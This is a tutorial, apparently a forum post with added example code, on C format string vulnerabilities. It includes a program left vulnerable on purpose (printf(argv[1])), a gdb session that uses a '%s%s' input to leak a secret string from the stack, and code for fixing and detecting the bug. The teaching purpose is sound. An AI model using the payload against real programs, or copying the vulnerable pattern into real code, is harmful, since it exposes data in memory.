Format strings are the strings used by the printf family of functions (printf, fprintf, etc.); the name stands for "print format". These functions accept a variable number of arguments, which are placed on the stack. As the function walks the format string and meets a format specifier, it pops the next piece of data from the stack and prints it at that position. For example:
In the following call
Code:
printf("Aneesh is %s", string);
the stack would look like this (top of the stack first):
Code:
==========
Aneesh is %s
==========
string
==========
Other variables
==========
garbage
==========
So what the function does is simple: each time it finds a format specifier, it pops the next value from the stack and displays it in the format we specified.
This in turn becomes a vulnerability if the function is not used properly.
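To make the "pop one value per specifier" behaviour concrete, here is an added example (my code, not from the original post): a tiny formatter, mini_format, that supports only %s and %d and walks the variadic arguments the same way printf does. Unlike real printf it takes an explicit argument count (the nargs parameter), so it can refuse a format that asks for more values than the caller passed; the function names, nargs, and the sample strings are my own and are not from the post.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Append s to out (capacity cap), truncating if needed; *len tracks the
   untruncated length so the caller can report it like snprintf does. */
static void append(char *out, size_t cap, size_t *len, const char *s)
{
    size_t n = strlen(s);
    if (*len < cap - 1) {
        size_t room = cap - 1 - *len;
        size_t take = n < room ? n : room;
        memcpy(out + *len, s, take);
        out[*len + take] = '\0';
    }
    *len += n;
}

/* Minimal printf-like formatter for %s and %d. For every directive it meets
   it takes the *next* variadic argument, exactly as printf pops the next
   value from the stack. nargs is the number of arguments actually supplied;
   real printf has no such count and keeps popping whatever is on the stack.
   Returns the number of characters the result needs, or -1 if the format
   asks for an argument that was never passed (or uses an unsupported
   conversion). */
int mini_format(char *out, size_t cap, size_t nargs, const char *fmt, ...)
{
    va_list ap;
    size_t used = 0, len = 0;
    char tmp[32];

    if (cap == 0)
        return -1;
    out[0] = '\0';

    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0'; p++) {
        char one[2] = { *p, '\0' };
        if (*p != '%') {                 /* ordinary character: copy it */
            append(out, cap, &len, one);
            continue;
        }
        p++;                             /* character after '%' */
        if (*p == '%') {                 /* "%%" is a literal percent sign */
            append(out, cap, &len, "%");
            continue;
        }
        if (used == nargs) {             /* printf would read garbage here */
            va_end(ap);
            return -1;
        }
        used++;
        if (*p == 's') {
            append(out, cap, &len, va_arg(ap, const char *));
        } else if (*p == 'd') {
            snprintf(tmp, sizeof tmp, "%d", va_arg(ap, int));
            append(out, cap, &len, tmp);
        } else {                         /* conversion not supported here */
            va_end(ap);
            return -1;
        }
    }
    va_end(ap);
    return (int)len;
}

int main(void)
{
    char buf[64];
    /* constructed sample: the call from the text, with one argument supplied */
    int n = mini_format(buf, sizeof buf, 1, "Aneesh is %s", "here");
    printf("%d chars: %s\n", n, buf);
    /* constructed sample: two %s directives but no arguments at all */
    n = mini_format(buf, sizeof buf, 0, "%s%s");
    printf("\"%%s%%s\" with 0 arguments -> %d (refused)\n", n);
    return 0;
}
```

The second call is the situation the rest of the tutorial sets up: the format string contains directives but the caller passed nothing for them. mini_format can say no because it knows nargs; printf cannot, which is why it reads whatever happens to be on the stack.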
Format String Vulnerabilities
In this article we'll only be looking at basic format string vulnerabilities: how to read data off the stack.
The vulnerable program we are using, format.c:
Code:
#include <stdio.h>

int main(int argc, char *argv[])
{
    char pass[] = "I am a secret .... Please dont print me..!!\n";  /* never printed on purpose */
    printf(argv[1]);  /* argv[1] is used directly as the format string: this is the bug */
    return 0;
}
Compiling:
Code:
aneesh@aneesh-laptop:~/articles/C$ gcc format.c -o format -ggdb -fno-stack-protector
format.c: In function ‘main’:
format.c:6: warning: format not a string literal and no format arguments
GCC is intelligent enough to warn us not to do this, but there is still software out there containing this kind of vulnerability.
Now let's run the program with a basic string:
Code:
aneesh@aneesh-laptop:~/articles/C$ ./format Hello
Helloaneesh@aneesh-laptop:~/articles/C$
It simply prints Hello (the program adds no newline, so the prompt follows right after it).
Now let's open the program in gdb and examine the stack:
Code:
aneesh@aneesh-laptop:~/articles/C$ gdb ./format
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/aneesh/articles/C/format...done.
(gdb)
List the program:
Code:
(gdb) list
1	#include<stdio.h>
2
3	int main(int argc,char *argv[])
4	{
5	char pass[] = "I am a secret .... Please dont print me..!!\n";
6	printf(argv[1]);
7	return(0);
8	}
(gdb)
Place a breakpoint at the start of main:
Code:
(gdb) break main
Breakpoint 1 at 0x80483ed: file format.c, line 5.
Run the program with a sample string and step up to the printf call:
Code:
(gdb) run hello
Starting program: /home/aneesh/articles/C/format hello

Breakpoint 1, main (argc=2, argv=0xbffff4e4) at format.c:5
5	char pass[] = "I am a secret .... Please dont print me..!!\n";
(gdb) s
6	printf(argv[1]);
(gdb)
Examine the data on the stack:
Code:
(gdb) x/2s $esp
0xbffff3f0: "\364?("
0xbffff3f4: "\364\237\004\b\b\364\377\277\350\202\004\b0\340\021I am a secret .... Please dont print me..!!\n"
We notice that we can reach the contents of the secret by popping the stack twice with %s.
Let's do this and check our solution:
Code:
(gdb) run %s%s
Starting program: /home/aneesh/articles/C/format %s%s

Breakpoint 1, main (argc=2, argv=0xbffff4f4) at format.c:5
5	char pass[] = "I am a secret .... Please dont print me..!!\n";
(gdb) s
6	printf(argv[1]);
(gdb) s
???#a secret .... Please dont print me..!!
7	return(0);
Boom, we printed the secret.
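As an added example (my code, not from the original post), here is the vulnerable call from format.c next to its one-line fix, plus a small helper that counts the conversion directives in an untrusted string so that a reviewer or a test can spot input like %s%s before it reaches a printf-style sink. The function names (greet_vulnerable, greet_safe, render_safe, count_format_directives) and the sample inputs are my own.

```c
#include <stdio.h>
#include <string.h>

/* Count printf conversion directives in an untrusted string. "%%" is a
   literal percent sign and does not consume an argument, so it is skipped.
   A non-zero result on data that is about to be used *as* a format string
   means the function will pop that many values the caller never passed. */
size_t count_format_directives(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {        /* escaped "%%": skip both characters */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* The pattern from format.c: the user string *is* the format string, so
   every directive in it makes printf fetch another argument from the stack.
   gcc reports this as "format not a string literal and no format arguments". */
void greet_vulnerable(const char *user)
{
    printf(user);
    putchar('\n');
}

/* The fix: a constant format, with the user string passed as data. Any
   directives inside `user` are now just characters to be copied. */
void greet_safe(const char *user)
{
    printf("%s\n", user);
}

/* Same fix, rendering into a buffer so the result can be inspected.
   Returns the number of characters snprintf wanted to write. */
int render_safe(char *out, size_t cap, const char *user)
{
    return snprintf(out, cap, "%s", user);
}

int main(int argc, char *argv[])
{
    /* constructed sample input: the same string used in the gdb session */
    const char *input = argc > 1 ? argv[1] : "%s%s";
    printf("directives in input: %zu\n", count_format_directives(input));
    greet_safe(input);            /* prints the two %s literally */
    return 0;
}
```

Building with `gcc -Wall -Wformat -Wformat-security` reproduces the warning shown above for greet_vulnerable and stays silent for greet_safe; adding `-Werror=format-security` turns that warning into a build failure, which is the cheapest way to keep this bug out of a code base.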
That's all for this tutorial. Maybe I'll write some more on format strings later, such as reading memory from a desired address.
